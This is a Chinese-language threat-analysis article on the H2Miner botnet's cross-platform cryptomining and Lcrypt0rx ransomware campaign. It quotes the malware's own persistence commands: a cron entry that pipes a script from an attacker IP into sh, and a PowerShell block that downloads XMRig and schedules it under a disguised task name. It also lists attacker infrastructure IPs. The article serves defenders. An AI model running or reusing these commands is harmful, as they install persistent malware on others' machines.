首次發現于2019年末的H2Miner僵尸網絡近期卷土重來，其攻擊手段已突破加密貨幣劫持與勒索軟件的界限。最新攻擊活動利用廉價虛擬專用服務器(VPS)和多種常見惡意軟件，同時入侵Linux主機、Windows工作站和容器工作負載。

多平臺攻擊技術

攻擊者通過組合云環境感知腳本、跨平臺編譯二進制文件以及系統原生命令，能在防御者察覺CPU負載異常前快速建立門羅幣挖礦通道。攻擊始于對配置錯誤服務或漏洞應用的利用，包括Apache ActiveMQ（CVE-2023-46604）和Log4Shell漏洞。

入侵成功后，僵尸網絡會部署定制化加載腳本——Linux系統使用ce.sh，Windows系統使用1.ps1——這些腳本會終止其他挖礦進程、禁用終端防護，并從78.153.140.66下載XMRig挖礦程序。容器環境同樣遭受攻擊：spr.sh腳本會掃描Docker鏡像并移除阿里云的aegis防護代理，隨后植入Kinsing惡意軟件。

復合型攻擊基礎設施

同一攻擊基礎設施還托管著位于47.97.113.36的Cobalt Strike團隊服務器，以及偽裝成"MicrosoftSoftware.exe"的Bitbucket代碼倉庫，顯示出成熟的多層命令與控制(C2)架構。Fortinet分析師發現，新型VBScript勒索軟件Lcrypt0rx已與挖礦程序捆綁傳播。

雖然其加密算法較為簡單——采用8,192字符的XOR密鑰結合文件專屬鹽值——但該腳本仍會覆寫主引導記錄(MBR)，并在系統中散布偽裝持久化鉤子。

錢包地址與托管服務器的重疊表明，當前攻擊者可能與H2Miner原始團隊存在協作或從屬關系。

持久化機制剖析

H2Miner通過分層感染鏈實現持久化。初始腳本會枚舉防御進程，使用暴力正則表達式終止這些進程，并通過清除命令歷史來抹除攻擊痕跡。

Linux系統中，ce.sh會植入每10分鐘自我重下載的cron計劃任務：

( crontab -l 2>/dev/null ; \
 echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -

Windows系統則通過1.ps1腳本將XMRig注冊為計劃任務：

$miner = "$env:TEMP\sysupdate.exe"
Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner
schtasks /create /f /tn "Update service for Windows Service" `
     /tr "$miner" /sc minute /mo 15 /rl highest

復合防御策略需求

在Windows平臺，Lcrypt0rx通過Shell.Application提權后，會嘗試修改Winlogon Shell和映像劫持(IFEO)注冊表鍵實現持久化。雖然注冊表邏輯存在缺陷，但惡意軟件通過部署6個輔助腳本（從循環執行殺毒軟件終止的advapi32_ext.vbs，到基礎自傳播腳本USB_bridge.vbs）確保存活。

這些輔助腳本均以隱藏系統文件屬性(+h +s +r)投放，并通過注冊表自啟動項調用。配合cpr.sh等頻繁更新的腳本，即使部分組件被清除，僵尸網絡仍能重建挖礦通道。防御者需全面清理容器鏡像、計劃任務、cron條目和異常注冊表鍵，否則門羅幣錢包（如4ASk4RhU...p8SahC）將在警報解除后持續竊取計算資源。